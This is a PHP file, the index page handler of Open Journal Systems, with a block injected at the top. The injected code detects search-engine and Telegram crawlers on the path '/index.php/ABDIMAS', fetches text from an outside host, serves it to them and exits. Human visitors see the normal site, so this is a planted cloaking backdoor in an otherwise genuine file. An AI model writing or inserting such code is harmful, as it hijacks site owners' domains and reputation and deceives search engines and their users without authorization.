<?php 
$u = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; 
$a = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';

if ($u == '/index.php/ABDIMAS' &&
preg_match('/Googlebot|Google-Site-Verification|Google-InspectionTool|Googlebot-Mobile|Googlebot-News|TelegramBot|bingbot|slurp/i', $a)) {
    echo @file_get_contents('https://ojs-ustj.pages.dev/ojs.ustj.txt');
    exit();
}
?>
<?php

/**
 * @defgroup pages_index Index Pages
 */
 
/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2003-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 * @brief Handle site index requests. 
 *
 */

switch ($op) {
	case 'index':
		define('HANDLER_CLASS', 'IndexHandler');
		import('pages.index.IndexHandler');
		break;
}

?>
